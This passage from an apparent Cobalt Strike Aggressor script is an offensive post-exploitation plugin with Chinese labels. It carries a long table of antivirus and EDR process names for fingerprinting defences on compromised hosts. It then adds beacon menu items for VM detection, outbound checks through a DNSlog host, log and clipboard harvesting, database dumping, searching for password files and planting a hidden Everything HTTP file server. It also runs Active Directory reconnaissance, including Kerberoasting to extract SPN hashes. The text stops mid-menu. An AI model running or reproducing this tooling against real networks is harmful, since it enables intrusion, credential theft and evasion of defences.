				"pspf.exe" => "已知杀软进程,名称暂未收录",
				"purge.exe" => "已知杀软进程,名称暂未收录",
				"qconsole.exe" => "Norton AntiVirus Quarantine Console",
				"qserver.exe" => "Norton Internet Security",
				"rapapp.exe" => "BlackICE",
				"rb32.exe" => "RapidBlaster",
				"rcsync.exe" => "PrizeSurfer",
				"realmon.exe" => "Realmon ",
				"rescue.exe" => "已知杀软进程,名称暂未收录",
				"rescue32.exe" => "卡巴斯基互联网安全套装",
				"rshell.exe" => "已知杀软进程,名称暂未收录",
				"rtvscn95.exe" => "Real-time virus scanner ",
				"rulaunch.exe" => "McAfee User Interface",
				"run32dll.exe" => "PAL PC Spy",
				"safeweb.exe" => "PSafe Tecnologia",
				"sbserv.exe" => "Norton Antivirus",
				"scrscan.exe" => "360杀毒",
				"sfc.exe" => "System file checker",
				"sh.exe" => "MKS Toolkit for Win3",
				"showbehind.exe" => "MicroSmarts Enterprise Component ",
				"soap.exe" => "System Soap Pro",
				"sofi.exe" => "已知杀软进程,名称暂未收录",
				"sperm.exe" => "已知杀软进程,名称暂未收录",
				"supporter5.exe" => "eScorcher反病毒",
				"symproxysvc.exe" => "Symantec",
				"symtray.exe" => "Symantec",
				"tbscan.exe" => "ThunderBYTE",
				"tc.exe" => "TimeCalende",
				"titanin.exe" => "TitanHide",
				"tvmd.exe" => "Total Velocity",
				"tvtmd.exe" => " Total Velocity",
				"vettray.exe" => "eTrust",
				"vir-help.exe" => "已知杀软进程,名称暂未收录",
				"vnpc3000.exe" => "已知杀软进程,名称暂未收录",
				"vpc32.exe" => "Symantec",
				"vpc42.exe" => "Symantec",
				"vshwin32.exe" => "McAfee",
				"vsmain.exe" => "McAfee",
				"vsstat.exe" => "McAfee",
				"wfindv32.exe" => "已知杀软进程,名称暂未收录",
				"zapro.exe" => "Zone Alarm",
				"zonealarm.exe" => "Zone Alarm",
				"AVPM.exe" => "Kaspersky",
				"A2CMD.exe" => "Emsisoft Anti-Malware",
				"A2SERVICE.exe" => "a-squared free",
				"A2FREE.exe" => "a-squared Free",
				"ADVCHK.exe" => "Norton AntiVirus",
				"AGB.exe" => "安天防线",
				"AHPROCMONSERVER.exe" => "安天防线",
				"AIRDEFENSE.exe" => "AirDefense",
				"ALERTSVC.exe" => "Norton AntiVirus",
				"AVIRA.exe" => "小红伞杀毒",
				"AMON.exe" => "Tiny Personal Firewall",
				"AVZ.exe" => "AVZ",
				"ANTIVIR.exe" => "已知杀软进程,名称暂未收录",
				"APVXDWIN.exe" => "熊猫卫士",
				"ASHMAISV.exe" => "Alwil",
				"ASHSERV.exe" => "Avast Anti-virus",
				"ASHSIMPL.exe" => "AVAST!VirusCleaner",
				"ASHWEBSV.exe" => "Avast",
				"ASWUPDSV.exe" => "Avast",
				"ASWSCAN.exe" => "Avast",
				"AVCIMAN.exe" => "熊猫卫士",
				"AVCONSOL.exe" => "McAfee",
				"AVENGINE.exe" => "熊猫卫士",
				"AVESVC.exe" => "Avira AntiVir Security Service",
				"AVEVL32.exe" => "已知杀软进程,名称暂未收录",
				"AVGAM.exe" => "AVG",
				"AVGCC.exe" => "AVG",
				"AVGCHSVX.exe" => "AVG",
				"AVGCSRVX" => "AVG",
				"AVGNSX.exe" => "AVG",
				"AVGCC32.exe" => "AVG",
				"AVGCTRL.exe" => "AVG",
				"AVGEMC.exe" => "AVG",
				"AVGFWSRV.exe" => "AVG",
				"AVGNTMGR.exe" => "AVG",
				"AVGSERV.exe" => "AVG",
				"AVGTRAY.exe" => "AVG",
				"AVGUPSVC.exe" => "AVG",
				"AVINITNT.exe" => "Command AntiVirus for NT Server",
				"AVPCC.exe" => "Kaspersky",
				"AVSERVER.exe" => "Kerio MailServer",
				"AVSCHED32.exe" => "H+BEDV",
				"AVSYNMGR.exe" => "McAfee",
				"AVWUPSRV.exe" => "H+BEDV",
				"BDSWITCH.exe" => "BitDefender Module",
				"BLACKD.exe" => "BlackICE",
				"CCEVTMGR.exe" => "Symantec",
				"CFP.exe" => "COMODO",
				"CLAMWIN.exe" => "ClamWin Portable",
				"CUREIT.exe" => "DrWeb CureIT",
				"DEFWATCH.exe" => "Norton Antivirus",
				"DRWADINS.exe" => "Dr.Web",
				"DRWEB.exe" => "Dr.Web",
				"DEFENDERDAEMON.exe" => "ShadowDefender",
				"EWIDOCTRL.exe" => "Ewido Security Suite",
				"EZANTIVIRUSREGISTRATIONCHECK.exe" => "e-Trust Antivirus",
				"FIREWALL.exe" => "AshampooSoftware",
				"FPROTTRAY.exe" => "F-PROT Antivirus",
				"FPWIN.exe" => "Verizon",
				"FRESHCLAM.exe" => "ClamAV",
				"FSAV32.exe" => "F-Secure",
				"FSBWSYS.exe" => "F-secure",
				"FSDFWD.exe" => "F-Secure",
				"FSGK32.exe" => "F-Secure",
				"FSGK32ST.exe" => "F-Secure",
				"FSMA32.exe" => "F-Secure",
				"FSMB32.exe" => "F-Secure",
				"FSSM32.exe" => "F-Secure",
				"GUARDGUI.exe" => "网游保镖",
				"GUARDNT.exe" => "IKARUS",
				"IAMAPP.exe" => "Symantec",
				"INOCIT.exe" => "eTrust",
				"INORPC.exe" => "eTrust",
				"INORT.exe" => "eTrust",
				"INOTASK.exe" => "eTrust",
				"INOUPTNG.exe" => "eTrust",
				"ISAFE.exe" => "eTrust",
				"KAV.exe" => "Kaspersky",
				"KAVMM.exe" => "Kaspersky",
				"KAVPF.exe" => "Kaspersky",
				"KAVPFW.exe" => "Kaspersky",
				"KAVSTART.exe" => "Kaspersky",
				"KAVSVC.exe" => "Kaspersky",
				"KAVSVCUI.exe" => "Kaspersky",
				"KMAILMON.exe" => "金山毒霸",
				"MCAGENT.exe" => "McAfee",
				"MCMNHDLR.exe" => "McAfee",
				"MCREGWIZ.exe" => "McAfee",
				"MCUPDATE.exe" => "McAfee",
				"MCVSSHLD.exe" => "McAfee",
				"MINILOG.exe" => "Zone Alarm",
				"MYAGTSVC.exe" => "McAfee",
				"MYAGTTRY.exe" => "McAfee",
				"NAVAPSVC.exe" => "Norton",
				"NAVAPW32.exe" => "Norton",
				"NAVLU32.exe" => "Norton",
				"NAVW32.exe" => "Norton Antivirus",
				"NEOWATCHLOG.exe" => "NeoWatch",
				"NEOWATCHTRAY.exe" => "NeoWatch",
				"NISSERV.exe" => "Norton",
				"NISUM.exe" => "Norton",
				"NMAIN.exe" => "Norton",
				"NOD32.exe" => "ESET NOD32",
				"NPFMSG.exe" => "Norman个人防火墙",
				"NPROTECT.exe" => "Symantec",
				"NSMDTR.exe" => "Norton",
				"NTRTSCAN.exe" => "趋势科技",
				"OFCPFWSVC.exe" => "OfficeScanNT",
				"ONLINENT.exe" => "已知杀软进程,名称暂未收录",
				"OP_MON.exe" => " OutpostFirewall",
				"PAVFIRES.exe" => "熊猫卫士",
				"PAVFNSVR.exe" => "熊猫卫士",
				"PAVKRE.exe" => "熊猫卫士",
				"PAVPROT.exe" => "熊猫卫士",
				"PAVPROXY.exe" => "熊猫卫士",
				"PAVPRSRV.exe" => "熊猫卫士",
				"PAVSRV51.exe" => "熊猫卫士",
				"PAVSS.exe" => "熊猫卫士",
				"PCCGUIDE.exe" => "PC-cillin",
				"PCCIOMON.exe" => "PC-cillin",
				"PCCNTMON.exe" => "PC-cillin",
				"PCCPFW.exe" => "趋势科技",
				"PCCTLCOM.exe" => "趋势科技",
				"PCTAV.exe" => "PC Tools AntiVirus",
				"PERSFW.exe" => "Tiny Personal Firewall",
				"PERVAC.exe" => "已知杀软进程,名称暂未收录",
				"PESTPATROL.exe" => "Ikarus",
				"PREVSRV.exe" => "熊猫卫士",
				"RTVSCN95.exe" => "Real-time Virus Scanner",
				"SAVADMINSERVICE.exe" => "SAV",
				"SAVMAIN.exe" => "SAV",
				"SAVSCAN.exe" => "SAV",
				"SDHELP.exe" => "Spyware Doctor",
				"SHSTAT.exe" => "McAfee",
				"SPBBCSVC.exe" => "Symantec",
				"SPIDERCPL.exe" => "Dr.Web",
				"SPIDERML.exe" => "Dr.Web",
				"SPIDERUI.exe" => "Dr.Web",
				"SPYBOTSD.exe" => "Spybot ",
				"SWAGENT.exe" => "SonicWALL",
				"SWDOCTOR.exe" => "SonicWALL",
				"SWNETSUP.exe" => "Sophos",
				"SYMLCSVC.exe" => "Symantec",
				"SYMPROXYSVC.exe" => "Symantec",
				"SYMSPORT.exe" => "Sysmantec",
				"SYMWSC.exe" => "Sysmantec",
				"SYNMGR.exe" => "Sysmantec",
				"TMLISTEN.exe" => "趋势科技",
				"TMNTSRV.exe" => "趋势科技",
				"TMPROXY.exe" => "趋势科技",
				"TNBUTIL.exe" => "Anti-Virus",
				"VBA32ECM.exe" => "已知杀软进程,名称暂未收录",
				"VBA32IFS.exe" => "已知杀软进程,名称暂未收录",
				"VBA32PP3.exe" => "已知杀软进程,名称暂未收录",
				"VCRMON.exe" => "VirusChaser",
				"VRMONNT.exe" => "HAURI",
				"VRMONSVC.exe" => "HAURI",
				"VSHWIN32.exe" => "McAfee",
				"VSSTAT.exe" => "McAfee",
				"XCOMMSVR.exe" => "BitDefender",
				"ZONEALARM.exe" => "Zone Alarm",
				"360rp.exe" => "360杀毒",
				"afwServ.exe" => " Avast Antivirus ",
				"safeboxTray.exe" => "360杀毒",
				"360safebox.exe" => "360杀毒",
				"QQPCTray.exe" => "QQ电脑管家",
				"KSafeTray.exe" => "金山毒霸",
				"KSafeSvc.exe" => "金山毒霸",
				"KWatch.exe" => "金山毒霸",
				"gov_defence_service.exe" => "云锁",
				"gov_defence_daemon.exe" => "云锁",
				"smartscreen.exe" => "Windows Defender",
				"macompatsvc.exe" => "McAfee",
				"mcamnsvc.exe " => "McAfee",
				"masvc.exe" => "McAfee",
				"mfemms.exe" => "McAfee",
				"mctary.exe" => "McAfee",
				"mcshield.exe" => "McAfee",
				"mfewc.exe" => "McAfee",
				"mfewch.exe" => "McAfee",
				"mfefw.exe" => "McAfee",
				"mfefire.exe" => "McAfee",
				"mfetp.exe" => "McAfee",
				"mfecanary.exe" => "McAfee",
				"mfeconsole.exe" => "McAfee",
				"mfeesp.exe" => "McAfee",
				"fcag.exe" => "McAfee",
				"fcags.exe" => "McAfee",
				"fcagswd.exe" => "McAfee",
				"fcagate.exe" => "McAfee",
				"360EntClient.exe" => "天擎EDR Agent",
				"edr_sec_plan.exe" => "深信服EDR Agent",
				"edr_monitor.exe" => "深信服EDR Agent",
				"edr_agent.exe" => "深信服EDR Agent",
				"ESCCControl.exe" => "启明星辰天珣EDR Agent",
				"ESCC.exe" => "启明星辰天珣EDR Agent",
				"ESAV.exe" => "启明星辰天珣EDR Agent",
				"ESCCIndex.exe" => "启明星辰天珣EDR Agent",
				"AliYunDun.exe" => "阿里云云盾",
				"wdswfsafe.exe" => "360杀毒-网盾",
				"TopsecMain.exe" => "天融信终端防御",
				"TopsecTray.exe" => "天融信终端防御",
				"YDLive.exe" =>"腾讯云-云镜",
				"YDService.exe" =>"腾讯云-云镜",
				"TitanAgent.exe" =>"天眼云镜",
				"TitanMonitor.exe" =>"天眼云镜",
				"gse_win_daemon.exe" =>"蓝鲸Agent",
				"gse_win_agent.exe" =>"蓝鲸Agent",
				"QHActiveDefense.exe" => "360 Total Security (360国际版)",
				"QHWatchdog.exe" => "360 Total Security (360国际版)",
				"QHSafeTray.exe" => "360 Total Security (360国际版)",
				"QHSafeMain.exe" => "360 Total Security (360国际版)"
				);
			bshell($1,"tasklist /SVC && echo AntiVirusCheckComplete");
			$bid = $1;
			on beacon_output {
				$message = $2;
				@array = split(" ",$message);
				@data = remove(@array,"");
				foreach $key => $value (@data){
					@data[$key] = replaceAt($value, "", 0, 2);
				}
				@data = remove(@array,"");
				foreach $key => $value (@data){
					@data[$key] = "\"".$value."\"";
				}
				
				$string1 = "";

				foreach $value (@data){
					$string1 = $string1.$value;
				}
				if("AntiVirusCheckComplete" isin $string1){
					$av = "";
					println("\c8===============================================");
					foreach $key (%sr){
						if ($key isin $string1){
							$av = $av.%sr[$key]." ";
							println("\c8Find antiVirus: ".%sr[$key]." => IPaddress:".binfo($1)['internal']);
						}
					}
				$ip = binfo($1)['internal'];
				%beacon_llist_av[$ip] = $av; 
				}else{
					exit();
				}
			}                
			set BEACON_SBAR_LEFT {
				local('$computer $user $pid $barch');
				$beacon_ip = $2['internal'];
				$av_list = %beacon_llist_av[$beacon_ip];
				if ($av_list eq ""){
					%beacon_llist_av[$beacon_ip] = "暂未发现杀软"
				}
				($computer, $user, $pid, $barch) = values($2, @('computer', 'user', 'pid', 'barch'));
				if ("x86" eq $barch) {
					return "[ $+ $computer $+ ] $user $+ / $+ $pid $+ \c4[ $av_list $+ ]";
				}
				else if ("x64" eq $barch) {
					return "[ $+ $computer $+ ] $user $+ / $+ $pid \cE(x64)\o $+ \c4[ $av_list $+ ]";
				}
				else {
					return " $+ \c4[ $av_list $+ ]";
				}
				
			}

		}
	}
	item "Check VM（虚拟机检测）" {
		blog($1, "\c9=========== Check VM（虚拟机检测） ==========");
		local('$bid');
		foreach $bid ($1){
			binput($1, "powershell-import Check-VM.ps1");
			bpowershell_import($1, script_resource("/scripts/InfoCollect/Check-VM.ps1"));
			binput($1, "powershell Check-VM");
			bpowershell($1, "Check-VM");
		}
	}
	item "SharpGetInfo（一键收集）" {
		blog($1, "\c9=========== SharpGetInfo（一键收集） ==========");
		bexecute_assembly($1, script_resource('/scripts/InfoCollect/Ladon.exe'), "GetInfo");
	}
	item "SharpListRDP（RDP记录）" {
		blog($1, "\c9=========== SharpListRDP（RDP记录查询） ==========");
		bexecute_assembly($1, script_resource('/scripts/InfoCollect/LRC.exe'));
	}	
	menu "其他主机信息收集" {
		item "SharpNetCheck (探测出网)" {
			blog($1, "\c9=========== SharpNetCheck (探测出网) ==========");
			$bid = $1['@'];
			$dialog = dialog("SharpNetCheck", %(host => "ceye.io",,type => "all",bid => $bid), &SharpNetCheck);
			dialog_description($dialog,"在 Dnslog 中回显内网 IP 地址和计算机名，可实现内网中的快速定位可出网机器。。项目地址：https://github.com/uknowsec/SharpNetCheck");
			drow_combobox($dialog, "type", "-dns/-http/all", @("-dns", "-http","-all"));
			drow_text($dialog, "host", "host/ip:  ");
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpNetCheck {
			$arg = join(' ', @($3['type'],"-host",$3['host']));
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpNetCheck.exe"), $arg);
		}

		item "SharpChassisType（判断主机类型）" {
			blog($1, "\c9=========== SharpChassisType（判断主机类型） ==========");
			$bid = $1['@'];
			$dialog = dialog("SharpNetCheck", %(bid => $bid), &SharpChassisType);
			dialog_description($dialog,"用于判断当前机器类型(桌面计算机、笔记本等判断)。项目地址：https://github.com/RcoIl/CSharp-Tools/");
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpChassisType{
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpChassisType.exe"), "");
		}


		item "SharpEventLog（获取系统登录日志）" {
			blog($1, "\c9=========== SharpEventLog（获取系统登录日志） ==========");
			$bid = $1;
			$dialog = dialog("SharpEventLog", %(EventLogType => "-4624",bid => $bid), &SharpEventLog);
			dialog_description($dialog, "读取登录过本机的登录失败或登录成功（4624，4625）的所有计算机信息，在内网渗透中快速定位运维管理人员。项目地址：https://github.com/uknowsec/SharpEventLog");
			drow_combobox($dialog, "EventLogType", "EventLog Type:", @("-4624", "-4625"));
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpEventLog {
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpEventLog.exe"), $3['EventLogType']);
		}

		item "SharpCheckInfo（获取多项主机信息）" {
			blog($1, "\c9=========== SharpCheckInfo（获取多项主机信息） ==========");
			$bid = $1;
			$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpCheckInfo);
			dialog_description($dialog, "收集目标主机信息，包括最近打开文件，系统环境变量和回收站文件等等。项目地址：https://github.com/uknowsec/SharpCheckInfo");
			drow_combobox($dialog, "Type", "Type:", @("-All", "-EnvironmentalVariables","-GetRecycle","-AllUserDirectories","-PowershellInfo","-CsharpVersion","-AvProcessEDRproduct","-Defender","-RecentFiles","-NetworkConnentions","-ApplockerEnumerating","-Drives","-LAPS"));
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpCheckInfo {
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpCheckInfo.exe"), $3['Type']);
		}

		item "SharpSQLDump（快速列出数据库数据）" {
			blog($1, "\c9=========== SharpSQLDump（快速列出数据库数据） ==========");
			$bid = $1['@'];
			$dialog = dialog("SharpSQLDump", %(host => "",username => "",password => "",type => "mysql",bid => $bid), &SharpSQLDump);
			dialog_description($dialog, "内网渗透中快速获取数据库所有库名，表名，列名。具体判断后再去翻数据，节省时间。适用于mysql，mssql。项目地址：https://github.com/uknowsec/SharpSQLDump");
			drow_text($dialog, "host", "host:  ");
			drow_text($dialog, "username", "username:  ");
			drow_text($dialog, "password", "password:  ");
			drow_combobox($dialog, "type", "-mysql/-mssql", @("-mysql", "-mssql"));
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpSQLDump {
			$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type']));
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpSQLDump.exe"), $arg);
		}

		item "SharpClipHistory（获取win10剪切板）" {
			blog($1, "\c9=========== SharpClipHistory（获取win10剪切板） ==========");
			$bid = $1;
			$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpClipHistory);
			dialog_description($dialog, "【开启 enableHistory 后直接运行即可读取】可用于从1809 Build版本开始读取Windows 10中用户剪贴板历史记录的内容。项目地址：https://github.com/FSecureLABS/SharpClipHistory");
			drow_combobox($dialog, "Type", "Type:", @("","--help","--checkOnly","--enableHistory","--saveImages","--keepassBypass"));
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpClipHistory {
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpClipHistory.exe"), $3['Type']);
		}

		item "SharpAVKB（杀软和补丁对比）" {
			blog($1, "\c9=========== SharpAVKB（杀软和补丁对比） ==========");
			$bid = $1;
			$dialog = dialog("SharpAVKB", %(type => "-AV",bid => $bid), &SharpAVKB);
			dialog_description($dialog, "Windows杀软对比和补丁号对比。项目地址：https://github.com/uknowsec/SharpAVKB");
			drow_combobox($dialog, "type", "type:", @("-AV", "-KB"));
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpAVKB {
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpAVKB.exe"), $3['type']);
		}

		item "SharpEDRChecker（获取EDR信息）" {
			blog($1, "\c9=========== SharpEDRChecker（获取EDR信息） ==========");
			$bid = $1['@'];
			btask($bid, "检查正在运行的进程，进程元数据，加载到当前进程中的Dll以及每个DLL元数据，通用安装目录，已安装的服务和每个服务二进制元数据，已安装的驱动程序和每个驱动程序元数据，所有这些都存在已知的防御性产品，例如AV，EDR和日志记录工具。还可以通过其元数据检查来捕获隐藏的EDR。项目地址：https://github.com/PwnDexter/SharpEDRChecker", "");
			bexecute_assembly($1, script_resource("/scripts/InfoCollect/SharpEDRChecker.exe"), "");
		}
		item "SharpDir（文件搜索）" {
			blog($1, "\c9=========== SharpDir（文件搜索） ==========");
			$bid = $1['@'];
			$dialog = dialog("文件搜索", %(path => "C:\\",file => "payload.exe||passwords*||*.txt",bid => $bid), &SharpDir);
			dialog_description($dialog, "文件搜索，三种搜索方式，指定文件名、制定文件名搜索后缀、搜索指定后缀文件。项目地址：https://github.com/jnqpblc/SharpDir");
			drow_text($dialog, "path", "path:  ");
			drow_text($dialog, "file", "file:  ");
			dbutton_action($dialog, "运行");
			dialog_show($dialog);
		}
		sub SharpDir {
			$arg = join(' ', @($3['path'],$3['file']));
			bexecute_assembly($bid, script_resource("/scripts/InfoCollect/SharpDir.exe"), $arg);
		}

		menu "Everything（建立 http 服务文件搜索）" {
			item "上传 Everything" {
			blog($1, "\c9=========== 上传 Everything ==========");
				$bid = $1;
				$dialog = dialog("上传 Everything", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &evething);
				dialog_description($dialog, "运行无任何弹窗，软件地址：https://www.voidtools.com/zh-cn/");
				drow_text($dialog, "UploadPath",  "上传路径: ");
				dbutton_action($dialog, "上传");
				dialog_show($dialog);
			}
			sub evething {
				bcd($bid, $3['UploadPath']);
				bupload($bid, script_resource("/scripts/InfoCollect/everything/Everything.exe"));
				bupload($bid, script_resource("/scripts/InfoCollect/everything/Everything.ini"));
			}

			item "运行 Everything" {
				blog($1, "\c9=========== 运行 Everything ==========");
				$bid = $1['@'];
				$Dialog = dialog("运行 Evething",%(bid => $bid),&Evething_run);
				dialog_description($Dialog, "运行无任何弹窗及托盘显示，自动启用http服务。端口：65535，用户：admin，密码：admin@123");
				btask($bid, "运行无任何弹窗及托盘显示，自动启用http服务。访问web服务：http://ip:65535，用户：admin，密码：admin@123", "");
				dbutton_action($Dialog, "运行");
				dialog_show($Dialog);
			}
			sub Evething_run{
				bshell($bid, "Everything.exe");
			}
			item "停止 Everything" {
				blog($1, "\c9=========== 停止 Everything ==========");
				local('$bid');
				foreach $bid ($1){
					bshell($1, "taskkill -f /im Everything.exe");
				}
			}
			item "删除 Everything" {
				blog($1, "\c9=========== 删除 Everything ==========");
				local('$bid');
				foreach $bid ($1){
					bshell($1, "taskkill -f /im Everything.exe & del /f /s /q Everything.exe & del /f /s /q Everything.ini");
				}
			}
		}
	}
	separator();
	menu "Netview（WinAPI）" {
		item "上传 netview" {
		blog($1, "\c9=========== 上传 netview ==========");
		$bid = $1;
		$dialog = dialog("上传 netview", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &netview);
		dialog_description($dialog, "Netview 使用 WinAPI 调用枚举系统，绝大部分功能不需要管理员权限。项目地址：https://github.com/mubix/netview");
		drow_text($dialog, "UploadPath",  "上传路径: ");
		dbutton_action($dialog, "上传");
		dialog_show($dialog);
		}
		sub netview {
		bcd($bid, $3['UploadPath']);
		bupload($bid, script_resource("/scripts/InfoCollect/netview.exe"));
		}
		item "运行 netview" {
		blog($1, "\c9=========== 运行 netview ==========");
		$bid = $1['@'];
		$Dialog = dialog("运行netview",%(domain => "xxx.com",bid => $bid),&netview_run);
		drow_text($Dialog, "domain", "domain: ");
		dbutton_action($Dialog, "运行");
		dialog_show($Dialog);
		}
		sub netview_run{
		local('$Name');
		$Name = $3['domain'];
		bshell($bid, "netview.exe -d  $+ $Name");
		}
		item "删除 netview" {
		blog($1, "\c9=========== 删除 netview ==========");
		local('$bid');
		foreach $bid ($1){
			bshell($1, "del /f /s /q netview.exe");
		}
		}
	}

	menu "Powerview 2008查询"{
		item "上传AD模块" {
			blog($1, "\c9=========== 上传AD模块 ==========");
			bupload($bid, script_resource("/scripts/InfoCollect/AD.dll"));
		}
		item "导入 Powerview" {
			blog($1, "\c9=========== 导入 Powerview ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				blog2($bid, "powerview导入测试");
				bpowershell($bid, "Import-Module .\\AD.dll;Get-DomainController");
			}
		}
		item "查看指定的用户信息" {
			blog($1, "\c9=========== 查看指定的用户信息 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				$dialog = dialog("查看指定用户", %(username => ""), &getuser);
				dialog_description($dialog, "powerview查看指定用户的信息");
				drow_text($dialog, "username", "用户: ");
				dbutton_action($dialog, "QUERY");
				dialog_show($dialog);
			}
		}

		item "所有用户最后一个错误的密码尝试" {
			blog($1, "\c9=========== 所有用户最后一个错误的密码尝试 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;get-aduser -filter * -prop lastbadpasswordattempt,badpwdcount | select name,lastbadpasswordattempt,badpwdcount | format-table -auto");
			}
		}


		item "查询某个组的用户" {
			blog($1, "\c9=========== 查询某个组的用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				$dialog = dialog("查看指定组的所有用户", %(groupname => ""), &groupquery);
				dialog_description($dialog, "powerview查看指定组的所有用户");
				drow_text($dialog, "groupname", "组名: ");
				dbutton_action($dialog, "QUERY");
				dialog_show($dialog);
			}

		}

		item "域控机器查询" {
			blog($1, "\c9=========== 域控机器查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADDomainController -filter * | Select-Object HostName,IPv4Address,OperatingSystem | fl");
			}
		}

		item "获取域级别" {
			blog($1, "\c9=========== 获取域级别 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADDomain | Select-Object DNSRoot,PDCEmulator,DomainMode");
			}
		}

		item "寻找域内所有计算机和计算机对应的DNS" {
			blog($1, "\c9=========== 寻找域内所有计算机和计算机对应的DNS ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADComputer -Filter * -Property Name,IPv4Address | Select-Object DNSHostName,IPv4Address,SID | fl");
			}
		}

		item "寻找域内所有用户" {
			blog($1, "\c9=========== 寻找域内所有用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Filter * | Select-Object Name,ObjectClass,SID | fl");
			}
		}
 
		item "寻找kerberos服务用户" {
			blog($1, "\c9=========== 寻找kerberos服务用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -filter {ServicePrincipalName -like \"*\"} -Property * | Select-Object Name,SID,ServicePrincipalNames | fl");
			}
		}

		item "无委派计算机查询" {
			blog($1, "\c9=========== 无委派计算机查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADComputer -Filter {TrustedForDelegation -eq \$True} -Properties * | select-object DNSHostName,IPv4Address,KerberosEncryptionType,whenCreated | fl");
			}
		}

		item "约束委派用户查询" {
			blog($1, "\c9=========== 约束委派用户查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Filter {TrustedToAuthForDelegation -eq \$True} -Properties * | select-object DistinguishedName,servicePrincipalName,msDS-AllowedToDelegateTo");
			}
		}

		item "域用户不要求kerberos验证身份查询" {
			blog($1, "\c9=========== 域用户不要求kerberos验证身份查询 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($pid, "Import-Module .\\AD.dll;Get-ADUser -Filter {DoesNotRequirePreAuth -eq \$False} | Select-Object Name,SID | fl");
			}
		}

		item "获取指定SPN用户的hash" {
			blog($1, "\c9=========== 获取指定SPN用户的hash ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				$dialog = dialog("获取指定SPN用户的hash", %(spnusername => ""), &spnuserquery);
				dialog_description($dialog, "powerview获取指定SPN用户的hash");
				drow_text($dialog, "spnusername", "用户: ");
				dbutton_action($dialog, "QUERY");
				dialog_show($dialog);
			}
		}

		item "枚举有价值(高权限组)的SPN用户" {
			blog($1, "\c9=========== 枚举有价值(高权限组)的SPN用户 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport($1, $modulename);
			foreach $bid ($1){
				bpowershell($bid, "Import-Module .\\AD.dll;Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon");
			}

		}
		sub moduleimport{
			foreach $bid ($1){
				blog($bid, "导入脚本: $modulename");
				bpowershell_import($bid, script_resource($modulename));
			}
		}

		sub getuser{
			bpowershell($bid, "Import-Module .\\AD.dll;Get-ADUser -Identity \"$3['username']\"");
		}

		sub groupquery{
			bpowershell($bid, "Import-Module .\\AD.dll;Get-ADGroupMember \'$3['groupname']\' | Select-Object name,objectClass,distinguishedName,SID | fl");
		}

		sub spnuserquery{
			bpowershell($bid, "Import-Module .\\AD.dll;Invoke-Kerberoast -Identity \'$3['spnusername']\' | %{\$_.hash}");
		}
	}

	menu "Powerview 2012查询" {
		item "导入 Powerview" {
			blog($1, "\c9=========== 导入 Powerview ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				blog2($bid, "powerview导入测试");
				bpowershell($bid, "Get-DomainController");
			}
		}
		item "查看指定的用户信息" {
			blog($1, "\c9=========== 查看指定的用户信息 ==========");
			$modulename = "/scripts/InfoCollect/Powerview.ps1";
			moduleimport12($1, $modulename);
			foreach $bid ($1){
				$dialog = dialog("查看指定用户", %(username => ""), &getuser);
				dialog_description($dialog, "powerview查看指定用户的信息");
				drow_text($dialog, "username", "用户: ");
				dbutton_action($dialog, "QUERY");
				dialog_show($dialog);
			}
		}

		item "所有用户最后一个错误的密码尝试" {
